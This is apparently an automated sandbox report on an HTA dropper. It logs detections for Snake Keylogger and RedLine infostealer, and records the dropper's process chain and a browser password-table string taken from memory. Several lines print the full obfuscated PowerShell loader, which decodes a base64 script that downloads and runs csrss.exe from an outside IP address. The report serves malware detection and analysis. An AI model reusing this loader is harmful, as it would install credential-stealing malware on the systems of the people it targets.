                  Source: 16.2.dajivhqI.pif.28550a4e.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 16.2.dajivhqI.pif.28550a4e.3.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 16.2.dajivhqI.pif.287c0ee8.6.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 16.2.dajivhqI.pif.287c0ee8.6.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 16.3.dajivhqI.pif.26abd218.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 16.3.dajivhqI.pif.26abd218.0.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 16.2.dajivhqI.pif.287c0ee8.6.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 16.2.dajivhqI.pif.287c0ee8.6.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 16.2.dajivhqI.pif.438038.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                  Source: 16.2.dajivhqI.pif.2993e390.7.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 16.2.dajivhqI.pif.2993e390.7.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 16.2.dajivhqI.pif.29916458.8.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 16.2.dajivhqI.pif.29916458.8.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 00000010.00000002.2494926367.0000000028510000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 00000010.00000002.2475304362.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                  Source: 00000010.00000002.2497539381.0000000029911000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 00000010.00000001.1355929269.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                  Source: 00000010.00000002.2495630239.00000000287C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 00000010.00000002.2495630239.00000000287C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 00000010.00000002.2497929209.000000002B4E0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 00000010.00000002.2497929209.000000002B4E0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 00000010.00000003.1383089164.0000000026ABD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: Process Memory Space: dajivhqI.pif PID: 7196, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 16.2.dajivhqI.pif.287c0ee8.6.raw.unpack, WP6RZJql8gZrNhVA9v.csCryptographic APIs: 'CreateDecryptor'
                  Source: 16.2.dajivhqI.pif.287c0ee8.6.raw.unpack, WP6RZJql8gZrNhVA9v.csCryptographic APIs: 'CreateDecryptor'
                  Source: 16.3.dajivhqI.pif.26abd218.0.raw.unpack, WP6RZJql8gZrNhVA9v.csCryptographic APIs: 'CreateDecryptor'
                  Source: 16.3.dajivhqI.pif.26abd218.0.raw.unpack, WP6RZJql8gZrNhVA9v.csCryptographic APIs: 'CreateDecryptor'
                  Source: 16.2.dajivhqI.pif.2b4e0000.10.raw.unpack, WP6RZJql8gZrNhVA9v.csCryptographic APIs: 'CreateDecryptor'
                  Source: 16.2.dajivhqI.pif.2b4e0000.10.raw.unpack, WP6RZJql8gZrNhVA9v.csCryptographic APIs: 'CreateDecryptor'
                  Source: 16.2.dajivhqI.pif.2b4e0000.10.raw.unpack, UltraSpeed.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 16.2.dajivhqI.pif.2b4e0000.10.raw.unpack, COVIDPickers.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 16.2.dajivhqI.pif.28551936.4.raw.unpack, WP6RZJql8gZrNhVA9v.csCryptographic APIs: 'CreateDecryptor'
                  Source: 16.2.dajivhqI.pif.28551936.4.raw.unpack, WP6RZJql8gZrNhVA9v.csCryptographic APIs: 'CreateDecryptor'
                  Source: 16.2.dajivhqI.pif.29916458.8.raw.unpack, WP6RZJql8gZrNhVA9v.csCryptographic APIs: 'CreateDecryptor'
                  Source: 16.2.dajivhqI.pif.29916458.8.raw.unpack, WP6RZJql8gZrNhVA9v.csCryptographic APIs: 'CreateDecryptor'
                  Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winHTA@22/17@3/4
                  Source: C:\Users\user\AppData\Roaming\csrss.exeCode function: 11_2_02E9793A GetDiskFreeSpaceA,11_2_02E9793A
                  Source: C:\Users\user\Links\dajivhqI.pifCode function: 16_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,CloseHandle,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,@__unlockDebuggerData$qv,VariantClear,VariantClear,VariantClear,16_2_004019F0
                  Source: C:\Users\user\Links\dajivhqI.pifCode function: 16_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,CloseHandle,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,@__unlockDebuggerData$qv,VariantClear,VariantClear,VariantClear,16_2_004019F0
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\csrss[1].exeJump to behavior
                  Source: C:\Users\user\Links\dajivhqI.pifMutant created: NULL
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1224:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7484:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7920:120:WilError_03
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_03jtveco.w1z.ps1Jump to behavior
                  Source: C:\Users\user\Links\dajivhqI.pifCommand line argument: 08A16_2_00413780
                  Source: C:\Users\user\Links\dajivhqI.pifCommand line argument: 08A16_2_00413780
                  Source: C:\Users\user\Links\dajivhqI.pifCommand line argument: 08A16_1_00413780
                  Source: C:\Users\user\AppData\Roaming\csrss.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: dajivhqI.pif, 00000010.00000002.2495714250.0000000028A5E000.00000004.00000800.00020000.00000000.sdmp, dajivhqI.pif, 00000010.00000002.2495714250.0000000028A9D000.00000004.00000800.00020000.00000000.sdmp, dajivhqI.pif, 00000010.00000002.2495714250.0000000028A90000.00000004.00000800.00020000.00000000.sdmp, dajivhqI.pif, 00000010.00000002.2497539381.000000002998D000.00000004.00000800.00020000.00000000.sdmp, dajivhqI.pif, 00000010.00000002.2495714250.0000000028A6E000.00000004.00000800.00020000.00000000.sdmp, dajivhqI.pif, 00000010.00000002.2495714250.0000000028A7C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                  Source: mybestgirlfriendwalkingaroundtheworld.htaReversingLabs: Detection: 23%
                  Source: mybestgirlfriendwalkingaroundtheworld.htaVirustotal: Detection: 37%
                  Source: unknownProcess created: C:\Windows\SysWOW64\mshta.exe mshta.exe "C:\Users\user\Desktop\mybestgirlfriendwalkingaroundtheworld.hta"
                  Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/C PoWErSHeLL -eX BYPass -nOp -w 1 -c DeviceCREdEntialdEpLoyMent ; iEx($(IEX('[SYSteM.TeXT.ENCoDinG]'+[CHar]58+[chaR]58+'UTf8.GETSTRING([SYsTeM.converT]'+[Char]0X3A+[CHAr]0x3a+'FRomBaSe64sTRiNG('+[CHaR]34+'JGpJVDE3aWdEICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFERC10WXBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FbWJFckRlZmlOSXRpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJsbU9uLkRsTCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEMsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSVFOak56ZXJlbixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBjUVQsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFIZHlKeixJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBxaWZSaGwpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJtaE95RFdxIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1lc3BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBYTEJ3RkNQICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRqSVQxN2lnRDo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5Mi4yMjcuMjI4LjIyLzU0L2NzcnNzLmV4ZSIsIiRlbnY6QVBQREFUQVxjc3Jzcy5leGUiLDAsMCk7c3RBcnQtc0xFRVAoMyk7aU52T2tFLWlURU0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVudjpBUFBEQVRBXGNzcnNzLmV4ZSI='+[cHaR]0X22+'))')))"
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe PoWErSHeLL -eX BYPass -nOp -w 1 -c DeviceCREdEntialdEpLoyMent ; iEx($(IEX('[SYSteM.TeXT.ENCoDinG]'+[CHar]58+[chaR]58+'UTf8.GETSTRING([SYsTeM.converT]'+[Char]0X3A+[CHAr]0x3a+'FRomBaSe64sTRiNG('+[CHaR]34+'JGpJVDE3aWdEICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFERC10WXBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FbWJFckRlZmlOSXRpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJsbU9uLkRsTCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEMsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSVFOak56ZXJlbixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBjUVQsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFIZHlKeixJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBxaWZSaGwpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJtaE95RFdxIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1lc3BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBYTEJ3RkNQICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRqSVQxN2lnRDo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5Mi4yMjcuMjI4LjIyLzU0L2NzcnNzLmV4ZSIsIiRlbnY6QVBQREFUQVxjc3Jzcy5leGUiLDAsMCk7c3RBcnQtc0xFRVAoMyk7aU52T2tFLWlURU0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVudjpBUFBEQVRBXGNzcnNzLmV4ZSI='+[cHaR]0X22+'))')))"
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\xzofjfee\xzofjfee.cmdline"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES43E7.tmp" "c:\Users\user\AppData\Local\Temp\xzofjfee\CSC4F15B4BDA3DF43B881AE17521298E1BA.TMP"
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\csrss.exe "C:\Users\user\AppData\Roaming\csrss.exe"
                  Source: C:\Users\user\AppData\Roaming\csrss.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\\Users\\All Users\\13.cmd""
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\AppData\Roaming\csrss.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\\Users\\All Users\\3185.cmd""
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\AppData\Roaming\csrss.exeProcess created: C:\Users\user\Links\dajivhqI.pif C:\\Users\\user\\Links\dajivhqI.pif
                  Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/C PoWErSHeLL -eX BYPass -nOp -w 1 -c DeviceCREdEntialdEpLoyMent ; iEx($(IEX('[SYSteM.TeXT.ENCoDinG]'+[CHar]58+[chaR]58+'UTf8.GETSTRING([SYsTeM.converT]'+[Char]0X3A+[CHAr]0x3a+'FRomBaSe64sTRiNG('+[CHaR]34+'JGpJVDE3aWdEICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFERC10WXBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FbWJFckRlZmlOSXRpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJsbU9uLkRsTCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEMsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSVFOak56ZXJlbixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBjUVQsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFIZHlKeixJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBxaWZSaGwpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJtaE95RFdxIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1lc3BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBYTEJ3RkNQICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRqSVQxN2lnRDo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5Mi4yMjcuMjI4LjIyLzU0L2NzcnNzLmV4ZSIsIiRlbnY6QVBQREFUQVxjc3Jzcy5leGUiLDAsMCk7c3RBcnQtc0xFRVAoMyk7aU52T2tFLWlURU0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVudjpBUFBEQVRBXGNzcnNzLmV4ZSI='+[cHaR]0X22+'))')))"Jump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe PoWErSHeLL -eX BYPass -nOp -w 1 -c DeviceCREdEntialdEpLoyMent ; iEx($(IEX('[SYSteM.TeXT.ENCoDinG]'+[CHar]58+[chaR]58+'UTf8.GETSTRING([SYsTeM.converT]'+[Char]0X3A+[CHAr]0x3a+'FRomBaSe64sTRiNG('+[CHaR]34+'JGpJVDE3aWdEICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFERC10WXBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FbWJFckRlZmlOSXRpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJsbU9uLkRsTCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEMsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSVFOak56ZXJlbixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBjUVQsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFIZHlKeixJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBxaWZSaGwpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJtaE95RFdxIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1lc3BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBYTEJ3RkNQICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRqSVQxN2lnRDo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5Mi4yMjcuMjI4LjIyLzU0L2NzcnNzLmV4ZSIsIiRlbnY6QVBQREFUQVxjc3Jzcy5leGUiLDAsMCk7c3RBcnQtc0xFRVAoMyk7aU52T2tFLWlURU0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVudjpBUFBEQVRBXGNzcnNzLmV4ZSI='+[cHaR]0X22+'))')))"Jump to behavior
